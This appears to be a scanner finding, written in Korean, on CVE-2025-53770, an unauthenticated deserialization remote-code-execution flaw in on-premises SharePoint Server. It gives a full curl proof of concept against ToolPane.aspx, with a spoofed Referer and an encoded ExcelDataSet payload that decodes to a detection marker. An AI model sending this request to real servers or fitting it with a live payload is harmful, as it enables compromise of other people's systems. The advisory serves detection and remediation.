
Microsoft SharePoint Server의 안전하지 않은 역직렬화를 통한 인증되지 않은 원격 코드 실행 (CVE-2025-53770)
심각 — Microsoft SharePoint Server의 안전하지 않은 역직렬화를 통한 인증되지 않은 원격 코드 실행 (CVE-2025-53770)
온-프레미스 Microsoft SharePoint Server에서 신뢰할 수 없는 데이터의 역직렬화로 인해 공격자가 원격으로 코드를 실행하고 시스템을 손상시킬 수 있습니다. Microsoft는 적극적인 악용을 인지하고 있으며 포괄적인 업데이트를 준비 중입니다. CVE 문서의 완화 조치가 적용되었는지 확인하십시오.
다음 PoC는 공격자가 취약한 엔드포인트를 통해 악성 페이로드를 추출하고 디코딩하기 위해 취약점을 악용하는 방법을 보여줍니다.
대상 도메인은 의도적으로 target.com으로 대체되었습니다.
curl -sk -X POST 'https://target.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
-H 'Referer: /_layouts/SignOut.aspx' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'MSOTlPn_Uri=https://target.com' \
--data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable="\K[^&]+(?=")' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'
<Info>IntruderScannerDetectionPayload</Info>
영향:
인증되지 않은 공격자가 안전하지 않은 역직렬화를 악용하여 SharePoint Server에서 원격 코드 실행을 달성하고 전체 시스템 손상을 초래할 수 있습니다.